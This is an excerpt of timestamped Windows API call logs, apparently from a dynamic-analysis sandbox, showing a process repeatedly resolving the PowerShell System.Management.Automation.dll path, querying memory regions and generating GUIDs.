	[0285.794] VirtualQuery (in: lpAddress=0x12b7a0, lpBuffer=0x12c660, dwLength=0x30 | out: lpBuffer=0x12c660*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.794] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.795] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.795] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.795] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.795] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x809efda0, Data2=0x2b4e, Data3=0x4d7b, Data4=([0]=0xb9, [1]=0x18, [2]=0xa0, [3]=0xe8, [4]=0x39, [5]=0x88, [6]=0xe7, [7]=0xab))) returned 0x0
	[0285.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.799] VirtualQuery (in: lpAddress=0x12b360, lpBuffer=0x12c220, dwLength=0x30 | out: lpBuffer=0x12c220*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.799] VirtualQuery (in: lpAddress=0x12b3f0, lpBuffer=0x12c2b0, dwLength=0x30 | out: lpBuffer=0x12c2b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.800] VirtualQuery (in: lpAddress=0x12b610, lpBuffer=0x12c4d0, dwLength=0x30 | out: lpBuffer=0x12c4d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.800] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xa0f5f1f, Data2=0xcddb, Data3=0x4c9d, Data4=([0]=0x85, [1]=0x60, [2]=0x18, [3]=0xea, [4]=0x43, [5]=0xe6, [6]=0x8c, [7]=0x84))) returned 0x0
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.802] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x76a402ef, Data2=0xe310, Data3=0x4ab9, Data4=([0]=0xb2, [1]=0xe0, [2]=0x3, [3]=0xae, [4]=0xd0, [5]=0xd4, [6]=0x16, [7]=0x67))) returned 0x0
	[0285.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.803] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xdc4bdd30, Data2=0xfee1, Data3=0x42f6, Data4=([0]=0x83, [1]=0xcf, [2]=0x10, [3]=0xd8, [4]=0x8, [5]=0xdc, [6]=0x8a, [7]=0x90))) returned 0x0
	[0285.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.804] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xd0448d78, Data2=0x654c, Data3=0x4da8, Data4=([0]=0xa5, [1]=0x2f, [2]=0xd4, [3]=0x5e, [4]=0x7b, [5]=0x8f, [6]=0xe4, [7]=0x40))) returned 0x0
	[0285.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
